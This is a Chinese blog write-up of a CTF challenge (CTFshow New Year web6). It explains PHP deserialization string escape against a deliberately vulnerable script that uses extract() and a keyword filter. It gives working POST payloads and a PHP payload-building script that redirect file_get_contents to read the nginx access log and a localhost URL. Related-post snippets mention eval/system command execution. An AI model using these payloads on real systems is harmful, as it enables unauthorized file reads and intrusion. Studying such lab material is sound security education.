CTFshow新春欢乐赛--web6--反序列化字符串逃逸

已于 2022-02-11 20:32:59 修改
阅读量1.8k 收藏 5
点赞数
分类专栏: CTF训练日记 文章标签: php 开发语言 后端
于 2022-02-09 23:20:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/122851769
版权

web6

考点:反序列化数组+字符串逃逸

这道题还是挺有意思的,首先看代码

 <?php

error_reporting(0);
highlight_file(__FILE__);
$function = $_GET['POST'];

function filter($img){
    $filter_arr = array('ctfshow','daniu','happyhuyear');
    $filter = '/'.implode('|',$filter_arr).'/i';
    //implode函数是将数组元素变成字符串
    return preg_replace($filter,'',$img);
}

if($_SESSION){
    unset($_SESSION);
}

$_SESSION['function'] = $function;

extract($_POST['GET']);

$_SESSION['file'] = base64_encode("/root/flag");

$serialize_info = filter(serialize($_SESSION));

if($function == 'GET'){
    $userinfo = unserialize($serialize_info);
    //出题人已经拿过flag,题目正常,也就是说...
    echo file_get_contents(base64_decode($userinfo['file']));
}

extract函数,是将一个数组中键名作为变量名,这儿就有一种类型题是变量覆盖(没有用到)

我们需要$function == ‘GET’

?POST=GET

利用点就是file_get_contents获取文件内容

查看web服务器是nginx,和题目中文字提示,得知我们应该需要读取nginx日志文件/var/log/nginx/access.log

构造反序列化数组

GET[_SESSION][ctfshowdaniu]=s:1:";s:1:"1";s:4:"file";s:36:"L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==";}

解释:因为是extract($_POST['GET']);,我们需要POST一个数组GET[_SESSION][ctfshowdaniu],这样传进去就可以得到$_SESSION数组变量,ctfshowdaniu是数组变量中的一个键。

为什么需要ctfshowdaniu?

答:为了利用filter函数中的str_replace替换成空,变成字符串减少的字符串逃逸。

$serialize_info为:
a:2:{s:12:"";s:70:"s:1:";s:1:"1";s:4:"file";s:36:"L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==";}";s:4:"file";s:16:"L3Jvb3QvZmxhZw==";}
$userinfo 为:
array(2) {
  '";s:70:"s:1:' =>
  string(1) "1"
  'file' =>
  string(36) "L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw=="
}

ctfshowdaniu刚好12个字符,替换成空后,需要12个字符来填充–";s:70:"s:1:刚好12个字符,

payload中的s:1:";s:1:"1"s:1:是完成前面12个字符的补充,后面的";s:1:"1"是为了补充完成一个键值对的反序列化格式。其中70个字符就是payload字符的70个。这样就达到一个字符的逃逸,让后面的s:4:"file";s:16:"L3Jvb3QvZmxhZw==";不起作用了。

构造payload代码

<?php
$_SESSION['function'] = 'GET';
$_POST[_SESSION][ctfshowdaniu]='s:1:";s:1:"1";s:4:"file";s:36:"L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==";}';
extract($_POST);
$_SESSION['file'] = base64_encode("/root/flag");
echo serialize($_SESSION).PHP_EOL;

为什么后面没有function?

因为extract函数处理ctfshowdaniu将数组变量的值function直接覆盖了。

image-20220208114304688

然后再读取http://127.0.0.1/ctfshow

GET[_SESSION][ctfshowdaniu]=s:1:";s:1:"1";s:4:"file";s:32:"aHR0cDovLzEyNy4wLjAuMS9jdGZzaG93";}

还有一个字符串逃逸的题

BUU-0CTFpiapiapia(反序列化字符串逃逸)

字符串逃逸知识点

反序列化总结

Z3eyOnd
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web6 详细解题思路
asdfghjklqwwe的博客
05-24 501
web 过滤绕过方法使用
CTFshow---新春欢乐
unexpectedthing的博客
02-11 1161
新春欢乐热身web1web2web3web4web5web6web7 热身 直接执行phpinfo(),有回显 开始准备找flag,但是没找到 看到了auto_prepend_file,有文件目录 直接读取 f=system(“nl /etc/ssh/secret/youneverknow/secret.php”); web1 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last
ctf 反序列化字符逃逸
giaogiao123的博客
12-17 891
第一种,关键词过滤,变多的 比如0ctf :piapiapia 我先说一次什么是反序列化字符逃逸。 <?php class user{ public $user = 'admin'; public $pass = 'passwd'; } $a = new user(); $b = serialize($a); echo $b."<br>";
2024年网安最新ctfshow-WEB-web6_ctf(1)
最新发布
2401_84297899的博客
05-03 835
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
ctfshow 新年欢乐WP
博客地址 www.sec0nd.top
02-21 527
文章目录热身方法一方法二web1web2web3web4 热身 <?php eval($_GET['f']); 方法一 打开之后先查看phpinfo() 直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件) 输出即可得flag 方法二 第二种思路是,查看当前页面得变量,直接出flag ?f=print_r(get_defined_vars()); web1 <?php highlight_file(__FILE__); error_reporting(0);
ctfshow 新春欢乐
qq_37561898的博客
02-02 3035
ctfshow 新春欢乐
java反序列化漏洞-验证.rar
06-25
java反序列化漏洞-验证jar
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
ctfshow 新春迎新 热身和web1
akxnxbshai的博客
02-07 895
一不小心在ctfshow上看了新春迎新,也就尝试做了一下,也算是检验自己这段时间以来的成果吧! 热身 看到代码本能感觉挺简单的,就一个eval函数,于是我便直接传入了system(‘ls’); 没发现flag,于是又查看。 想着用通配符 发现没用,又用了?也没用。 所以想到了另一种无参rce。 首先查看了当前页面的变量,直接发现了flag,也算是误打误撞。 Payload:?f= print_r(get_defined_vars()); web1 刚开始看到这
MOCTF新春欢乐-逆向writeup
杀生丸?不,其实我要的是桔梗
02-15 954
1.easyre(50) &lt;给入门小伙子看的哈&gt; 这是一个linux的运行文件。 IDA打开: 知道关键代码在getflag函数。 双击进入getflag IDA会把字符串转为16进制。 现在你需要将这些转回来。对着16进制按R 现在代码的思路就很清楚了。 创建一个字符串=“}moctf” strcat拼接acc,add,‘-’,abb 最后加上‘}’...
2021年“春秋杯”新年欢乐--十二宫的挑衅
qwzf
02-06 1166
前言
反序列化字符串逃逸——初体验
D.MIND 的博客
02-27 1423
前言:从CTFshow上做的一道反序列化字符串逃逸的题,第一次接触,想了半天(可能是我太菜了>__<)后来才发现其实不难理解,真的需要动手写脚本操作一下,光看不好理解 题目链接 message.php: <?php highlight_file(__FILE__); include('flag.php'); class message{ public $from; public $msg; public $to; public $token='user
0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸)
Sea_Sand息禅
07-21 6469
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $...
ctfshow web入门(php反序列化)
qq_53263789的博客
07-19 498
ctfshow
ctfshow 新春迎新 web2、web3
akxnxbshai的博客
02-09 496
Web2 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last Modified by: h1xa # @Last Modified time: 2022-01-24 22:14:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ highlight_file(__FILE__); session_star
ctfshow-萌新-web6( 利用二进制绕过获取网站敏感信息)
热门推荐
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web6关,这一关的考点是intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了单双引号,or,加减乘除号,叹号,异或,hex,select等关键字,推荐使用二进制绕过 页面中展示了部分源码,并提示我们 id=1000 时,就是flag 这里先上答案,payload如下 ?id=0b1111101000 接下来详细解释一下解题的思路,首先是利用intval()函数转换字符串的特性进行绕过 intval()函数...
ctfshow_新春欢乐2022
A的博客
02-03 945
不泄露wp每晚9点更新 热身 ?f=phpinfo(); web1 web2
xxl-job反序列化漏洞
09-12
你好!关于xxl-job反序列化漏洞,这是一个比较严重的安全问题。该漏洞存在于xxl-job的任务调度中,攻击者可以通过构造恶意序列化数据来执行任意代码,从而导致系统被攻击或者遭受数据泄露。 为了解决这个问题,你可以采取以下措施: 1. 及时升级:确保你使用的xxl-job版本是最新的,开发团队会在新版本中修复安全漏洞。 2. 配置安全策略:配置xxl-job的安全策略,限制任务执行的权限,防止恶意代码执行。 3. 过滤用户输入:对于外部输入参数,要进行严格的过滤和校验,避免恶意数据的注入。 4. 序列化安全性:对于涉及到序列化的操作,可以考虑使用更安全的序列化库,或者对序列化的数据进行签名、加密等操作,增加攻击者的难度。 5. 加强系统监控:及时监测系统的异常行为和异常网络流量,发现异常情况及时采取相应的应对措施。 希望以上措施能够帮助你有效地解决xxl-job反序列化漏洞问题。如果你有任何其他问题,请随时向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值